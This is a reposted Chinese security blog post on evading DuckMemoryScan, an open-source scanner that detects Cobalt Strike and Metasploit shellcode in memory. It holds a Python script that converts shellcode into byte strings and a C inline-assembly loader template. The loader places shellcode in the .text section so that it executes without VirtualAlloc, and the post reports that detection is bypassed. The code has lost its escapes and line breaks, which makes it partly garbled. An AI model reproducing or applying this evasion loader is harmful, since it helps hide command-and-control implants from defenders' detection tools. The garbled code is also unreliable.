蹭热点之绕过DuckMemoryScan

admin 2021年2月26日00:00:501 333 views字数 1069阅读3分33秒阅读模式

 昨天的事,谢谢各位师傅们了,所以写了该文来感谢各位师傅。而且今天是元宵节,祝大家元宵节快乐哦。



蹭热点之绕过DuckMemoryScan



昨天,Github上出现了一个针对CS与MSF的内存扫描项目名叫DuckMemoryScan地址为:https://github.com/huoji120/DuckMemoryScan


根据该项目的介绍:

  1. HWBP hook检测 检测线程中所有疑似被hwbp隐形挂钩

  2. 内存免杀shellcode检测(metasploit,Cobaltstrike完全检测)

  3. 可疑进程检测(主要针对有逃避性质的进程[如过期签名与多各可执行区段])

  4. 无文件落地木马检测(检测所有已知内存加载木马)

  5. 简易rootkit检测(检测证书过期/拦截读取/证书无效的驱动)


也就是类似于之前的CobaltStrikeScan之类的工具,我们来看一下如何绕过它。


首先拿了一个我之前的免杀马做测试,发现成功的检测出来了,毕竟项目介绍中也写到了会对"VirtualAlloc"函数进行检测。


蹭热点之绕过DuckMemoryScan


那么我们就可以来想其他办法来操作了,项目介绍中说 但大部分普通程序均不会在VirtualAlloc区域内执行代码.一般都是在.text区段内执行代码,那我们在.text区段内执行代码不就行了嘛。


先使用我们的脚本转换一下shellcode


import binasciiimport sysimport re
if __name__ == "__main__":   if len(sys.argv) < 2: sys.exit(0) try: data = binascii.b2a_hex(open(sys.argv[1], "rb").read()).decode() except: print("Error reading %s" % sys.argv[1]) sys.exit(0) if "-list" in sys.argv: print("0x" + ",0x".join(re.findall("..", data))) else: print("\x" + "\x".join(re.findall("..", data)))


然后加载:


#include <Windows.h>
int main() { asm("call codent" ".byte {{SHELLCODE}}nt" "code:nt" "retnt");
return 0;}


成功写入


蹭热点之绕过DuckMemoryScan


成功绕过检测。


蹭热点之绕过DuckMemoryScan


当然方法还有很多,就看各位师傅发挥了(ps:每次检测这个程序都会检测出来微信,不明觉厉,23333)


     ▼
更多精彩推荐,请关注我们

蹭热点之绕过DuckMemoryScan



本文始发于微信公众号(鸿鹄实验室):蹭热点之绕过DuckMemoryScan

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年2月26日00:00:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   蹭热点之绕过DuckMemoryScanhttps://cn-sec.com/archives/273644.html
评论  1  访客  1
    • Fay 0

      其实好像只要不用VirtualAlloc就能逃过检测(
      所以不改到.text段也没问题(不用VirtualAlloc执行shellcode方法也蛮多的

    发表评论

    匿名网友 填写信息

    取消